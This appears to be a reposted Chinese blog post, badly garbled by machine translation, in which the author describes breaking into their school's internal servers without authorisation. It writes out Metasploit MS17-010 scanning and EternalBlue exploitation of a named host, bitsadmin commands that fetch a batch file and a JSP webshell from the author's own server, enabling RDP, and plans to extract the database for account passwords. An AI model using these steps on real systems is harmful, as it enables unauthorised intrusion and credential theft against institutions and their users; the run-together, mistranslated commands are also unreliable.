首页 > 编程知识 正文

安全帮内网渗透,内网横向渗透工具

时间:2023-05-05 22:02:02 阅读:40888 作者:1235

“黑”放弃自己的学校,可能是很多黑广们学生时代的共同执念。

前言:我想反复无常,突然看看学校里有没有能用永恒的蓝色击落的机器。 顺便想想内网刚刚渗透,上次测试还刚刚推出永恒蓝色利用工具的时候,那时msf还没有集成,现在直接用msf方便了。

信息收集:发现10.10.10.0/24是学校各种服务器使用的IP

使用MSF批量ms17_010验证模块:

ms F5 use auxiliary/scanner/SMB/SMB _ ms17 _ 010 ms F5 auxiliary (scanner/SMB/SMB _ ms17 _ 010 ) ) ) ) )

漏洞利用:当cmdshell经过测试的IP获得10.10.10.104主机(2008 x64 )时,可以正常使用。

此主机的重要信息:

8080端口正在运行tomcat服务。 3389端口未开放。 3306正在运行MySQL服务。 没有考虑其他端口。

ms F5 use exploit/windows/SMB/ms17 _ 010 _ eternalbluemsf5exploit (windows/SMB/ms17 _ 010 _ eternal blue ) showoptiopt 3360 namecurrentsettingrequireddescription-----------rhostsyyi 45 yesthetargetport (TCP ) SMBdomain.no ) thepasswordforthespecifiedusernamesmbuserno (可选) )。 theusernametoauthenticateasverify _ archtrueyescheckifremotearchitecturematchesexploittarget.verify _ targettrueyescheckif : idname----0windows7andserver 2008 R2 (x64 ) allservicepacksmsf5exploit (windows7andserver 2008 R2 ) x64 ) allservicepapand hosts 10.10.10.104 rhosts=10.10.10.104 ms F5 exploit (windows/SMB/ms17 _ 010 )。 但是,令人怀疑的是,任务列表/SVC看了当前的流程,有360个自主防御,按理说应该会被屏蔽。 我可能很幸运2333 :

将cmdshell升级(失败) meterpreter比meterpreter更难使用(meterpreter更强大) cmdshell因此尝试升级到meterpreter

第一种方法

ms F5 exploit (windows/SMB/ms17 _ 010 _ eternal blue ) use post/multi/manage/shell _ to _ meterpretermsf5post ) multi 3360 namecurrentsettingrequireddescription------------ -处置器处置器连接. lport 4433 yesportforpayloadtoconnectto.sessionyessiontorunthismoduleon.ms F5 post (multi/manage/shell _ to _ mm

第二种方法:

sessions -u 1。我不知道为什么会失败(换个思路吧) :

远程文件下载:

windows上的远程文件下载功能很强大,需要使用什么就远程下载即可。

我一开始就想直接打开端口添加帐户登录,但远程连接出现了问题,所以我想尝试打开shell

打开远程连接本机打开apache服务,将3389.bat放在/var/www/html下,在cmdshell上运行,下载成功后运行3389.bat

bits admin/transfer n http://IP/open 3389.batc :windows3389.bat运行完成后,发现(记得删除) 3389端口处于打开状态

Kali下连接远程桌面有点问题,百度也下去了,但不太清楚(放弃了一段时间)。

但是,在那之后,换乘win系统似乎就没问题了。 因为我在想到底怎么方便来(物理机工作的kali,要换乘win就必须关掉系统),所以也没掌握密码。

请尝试获取shell,首先找到web所在的目录(包含空间的目录通过双引号记住) :

dirc :dir ' c :program files' . dir ' c :program filesapachesoftwarefoundationTomcat 7.0wer

最后,我们决定将shell放在系统ui框架的目录下

同样,用远程文件将jsp马来西亚下载到此目录下

bits admin/transfer n http://IP/xieying.JSP ' c :program filesapachesoftwarefoundationTomcat 7.0web appseer

通过浏览器访问马来西亚登录:

我觉得结束后摆弄的无非是远程登录。 没什么必要。 翻阅系统文件后,只要卸下该电力系统的war软件包,然后卸下备份的数据库,在本地自行生成,就应该能得到系统的帐户密码。

已删除shell。 我还是个听话的好学生。

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。